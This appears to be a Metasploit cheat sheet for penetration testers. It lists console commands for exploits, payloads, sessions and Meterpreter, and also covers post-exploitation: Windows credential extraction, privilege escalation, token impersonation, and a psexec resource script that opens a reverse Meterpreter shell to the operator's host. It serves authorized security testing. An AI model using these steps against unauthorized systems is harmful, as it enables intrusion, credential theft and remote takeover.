Links

Metasploit Framework (MSF)

The world’s most used penetration testing framework Metasploit

Start

Start db
msfdb start
or
systemctl start postgresql
Start metasploit framework console
msfconsole

Exploits

Select exploit
use <exploit>
Run exploit
run
or
exploit

Options

Show options
show options
Show advanced options
show advanced
Set option
set <option> <value>
Set option (global)
setg <option> <value>

Payloads

Show payloads
show payloads
Select payload
set payload <payload>

Sessions

Show sessions
sessions -h
Interact with session
sessions <number>
Send session to background
background

Meterpreter

The shell command will present you with a standard shell on the target system.
shell
Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.
getsystem

Encoders

Show encoders
show encoders
Select encoder
set encoder <encoder>

Misc

Search for exploits
search <term>
Go back
back
Display help
help
Get info about current context?
info
show auxiliary

Multi/handler

Just start listener
use exploit/multi/handler

Jobs

Start job in background
run -j
Show jobs
jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.
use post/multi/recon/local_exploit_suggester
This module extracts the plain-text Windows user login password in Registry.
use post/windows/gather/credentials/windows_autologin
This module will login with the specified username/password and execute the supplied command as a hidden process.
use post/windows/manage/run_as

Meterpreter session

Upgrade shell to meterpreter shell
post/multi/manage/shell_to_meterpreter
Migrate to other (e.g. more stable) process
migrate
Get system info
sysinfo
Port forwarding
portfwd add -l <port> -r 127.0.0.1 -p <port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.
whoami /priv
Load incognito module and list available tokens
load incognito
list_tokens -g
Impersonate e.g. BUILTIN\Administrators
impersonate_token "BUILTIN\Administrators"
Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).
ps
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.
msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>